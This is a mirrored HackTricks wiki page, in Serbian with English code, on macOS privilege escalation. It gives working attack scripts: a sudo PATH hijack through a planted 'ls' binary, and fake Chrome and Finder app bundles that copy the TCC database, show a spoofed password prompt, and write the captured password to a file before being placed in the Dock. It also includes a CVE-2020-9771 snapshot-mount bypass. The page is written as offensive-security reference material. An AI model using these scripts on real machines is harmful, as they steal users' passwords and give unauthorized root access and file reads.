mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 16:10:54 +00:00
269 lines
12 KiB
Markdown
269 lines
12 KiB
Markdown
# macOS Privilege Escalation
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
## TCC Privilege Escalation
|
|
|
|
Ako ste došli ovde tražeći TCC eskalaciju privilegija, idite na:
|
|
|
|
{% content-ref url="macos-security-protections/macos-tcc/" %}
|
|
[macos-tcc](macos-security-protections/macos-tcc/)
|
|
{% endcontent-ref %}
|
|
|
|
## Linux Privesc
|
|
|
|
Imajte na umu da **većina trikova o eskalaciji privilegija koji utiču na Linux/Unix će takođe uticati na MacOS** mašine. Tako da pogledajte:
|
|
|
|
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
|
|
[privilege-escalation](../../linux-hardening/privilege-escalation/)
|
|
{% endcontent-ref %}
|
|
|
|
## User Interaction
|
|
|
|
### Sudo Hijacking
|
|
|
|
Možete pronaći originalnu [Sudo Hijacking tehniku unutar posta o Linux eskalaciji privilegija](../../linux-hardening/privilege-escalation/#sudo-hijacking).
|
|
|
|
Međutim, macOS **održava** korisnikov **`PATH`** kada izvršava **`sudo`**. Što znači da bi drugi način za postizanje ovog napada bio da se **otmu drugi binarni fajlovi** koje žrtva još uvek izvršava kada **pokreće sudo:**
|
|
```bash
|
|
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
|
|
cat > /opt/homebrew/bin/ls <<EOF
|
|
#!/bin/bash
|
|
if [ "\$(id -u)" -eq 0 ]; then
|
|
whoami > /tmp/privesc
|
|
fi
|
|
/bin/ls "\$@"
|
|
EOF
|
|
chmod +x /opt/homebrew/bin/ls
|
|
|
|
# victim
|
|
sudo ls
|
|
```
|
|
Napomena da korisnik koji koristi terminal verovatno ima **Homebrew instaliran**. Tako da je moguće preuzeti binarne datoteke u **`/opt/homebrew/bin`**.
|
|
|
|
### Imitacija Dock-a
|
|
|
|
Korišćenjem nekih **socijalnih inženjeringa** mogli biste **imitirati na primer Google Chrome** unutar dock-a i zapravo izvršiti svoj skript:
|
|
|
|
{% tabs %}
|
|
{% tab title="Imitacija Chrome-a" %}
|
|
Neki predlozi:
|
|
|
|
* Proverite u Dock-u da li postoji Chrome, i u tom slučaju **uklonite** tu stavku i **dodajte** **lažnu** **Chrome stavku na istu poziciju** u Dock nizu. 
|
|
```bash
|
|
#!/bin/sh
|
|
|
|
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
|
|
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';
|
|
|
|
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
|
|
|
|
# Create App structure
|
|
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
|
|
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
|
|
|
|
# Payload to execute
|
|
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
int main() {
|
|
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
|
|
"sleep 2; "
|
|
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
|
|
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
|
|
"echo \$PASSWORD > /tmp/passwd.txt";
|
|
system(cmd);
|
|
return 0;
|
|
}
|
|
EOF
|
|
|
|
gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
|
|
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c
|
|
|
|
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
|
|
|
|
# Info.plist
|
|
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
|
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
|
<plist version="1.0">
|
|
<dict>
|
|
<key>CFBundleExecutable</key>
|
|
<string>Google Chrome</string>
|
|
<key>CFBundleIdentifier</key>
|
|
<string>com.google.Chrome</string>
|
|
<key>CFBundleName</key>
|
|
<string>Google Chrome</string>
|
|
<key>CFBundleVersion</key>
|
|
<string>1.0</string>
|
|
<key>CFBundleShortVersionString</key>
|
|
<string>1.0</string>
|
|
<key>CFBundleInfoDictionaryVersion</key>
|
|
<string>6.0</string>
|
|
<key>CFBundlePackageType</key>
|
|
<string>APPL</string>
|
|
<key>CFBundleIconFile</key>
|
|
<string>app</string>
|
|
</dict>
|
|
</plist>
|
|
EOF
|
|
|
|
# Copy icon from Google Chrome
|
|
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
|
|
|
|
# Add to Dock
|
|
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
|
|
sleep 0.1
|
|
killall Dock
|
|
```
|
|
{% endtab %}
|
|
|
|
{% tab title="Finder Impersonacija" %}
|
|
Neki predlozi:
|
|
|
|
* Ne **možete ukloniti Finder iz Dock-a**, pa ako planirate da ga dodate u Dock, možete staviti lažni Finder odmah pored pravog. Za to treba da **dodate lažni Finder unos na početak Dock niza**.
|
|
* Druga opcija je da ga ne stavljate u Dock i samo ga otvorite, "Finder traži da kontroliše Finder" nije tako čudno.
|
|
* Još jedna opcija za **eskalaciju na root bez traženja** lozinke sa užasnom porukom, je da naterate Findera da stvarno traži lozinku za obavljanje privilegovane akcije:
|
|
* Zatražite od Findera da kopira u **`/etc/pam.d`** novu **`sudo`** datoteku (Poruka koja traži lozinku će ukazati da "Finder želi da kopira sudo")
|
|
* Zatražite od Findera da kopira novi **Authorization Plugin** (Možete kontrolisati ime datoteke tako da poruka koja traži lozinku ukazuje da "Finder želi da kopira Finder.bundle")
|
|
```bash
|
|
#!/bin/sh
|
|
|
|
# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
|
|
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';
|
|
|
|
rm -rf /tmp/Finder.app/ 2>/dev/null
|
|
|
|
# Create App structure
|
|
mkdir -p /tmp/Finder.app/Contents/MacOS
|
|
mkdir -p /tmp/Finder.app/Contents/Resources
|
|
|
|
# Payload to execute
|
|
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
int main() {
|
|
char *cmd = "open /System/Library/CoreServices/Finder.app & "
|
|
"sleep 2; "
|
|
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
|
|
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
|
|
"echo \$PASSWORD > /tmp/passwd.txt";
|
|
system(cmd);
|
|
return 0;
|
|
}
|
|
EOF
|
|
|
|
gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
|
|
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c
|
|
|
|
chmod +x /tmp/Finder.app/Contents/MacOS/Finder
|
|
|
|
# Info.plist
|
|
cat << EOF > /tmp/Finder.app/Contents/Info.plist
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
|
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
|
<plist version="1.0">
|
|
<dict>
|
|
<key>CFBundleExecutable</key>
|
|
<string>Finder</string>
|
|
<key>CFBundleIdentifier</key>
|
|
<string>com.apple.finder</string>
|
|
<key>CFBundleName</key>
|
|
<string>Finder</string>
|
|
<key>CFBundleVersion</key>
|
|
<string>1.0</string>
|
|
<key>CFBundleShortVersionString</key>
|
|
<string>1.0</string>
|
|
<key>CFBundleInfoDictionaryVersion</key>
|
|
<string>6.0</string>
|
|
<key>CFBundlePackageType</key>
|
|
<string>APPL</string>
|
|
<key>CFBundleIconFile</key>
|
|
<string>app</string>
|
|
</dict>
|
|
</plist>
|
|
EOF
|
|
|
|
# Copy icon from Finder
|
|
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns
|
|
|
|
# Add to Dock
|
|
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
|
|
sleep 0.1
|
|
killall Dock
|
|
```
|
|
{% endtab %}
|
|
{% endtabs %}
|
|
|
|
## TCC - Eskalacija privilegija za root
|
|
|
|
### CVE-2020-9771 - mount\_apfs TCC zaobilaženje i eskalacija privilegija
|
|
|
|
**Bilo koji korisnik** (čak i oni bez privilegija) može kreirati i montirati snapshot vremenske mašine i **pristupiti SVIM datotekama** tog snapshot-a.\
|
|
**Jedina privilegija** koja je potrebna je da aplikacija koja se koristi (kao što je `Terminal`) ima **Pristup celom disku** (FDA) (`kTCCServiceSystemPolicyAllfiles`) koji mora odobriti administrator.
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Create snapshot
|
|
tmutil localsnapshot
|
|
|
|
# List snapshots
|
|
tmutil listlocalsnapshots /
|
|
Snapshots for disk /:
|
|
com.apple.TimeMachine.2023-05-29-001751.local
|
|
|
|
# Generate folder to mount it
|
|
cd /tmp # I didn it from this folder
|
|
mkdir /tmp/snap
|
|
|
|
# Mount it, "noowners" will mount the folder so the current user can access everything
|
|
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
|
|
|
|
# Access it
|
|
ls /tmp/snap/Users/admin_user # This will work
|
|
```
|
|
{% endcode %}
|
|
|
|
Detaljnije objašnjenje može se [**pronaći u originalnom izveštaju**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**
|
|
|
|
## Osetljive informacije
|
|
|
|
Ovo može biti korisno za eskalaciju privilegija:
|
|
|
|
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
|
|
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
|
|
{% endcontent-ref %}
|
|
|
|
{% hint style="success" %}
|
|
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Podrška HackTricks</summary>
|
|
|
|
* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
|
|
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
|
|
|
</details>
|
|
{% endhint %}
|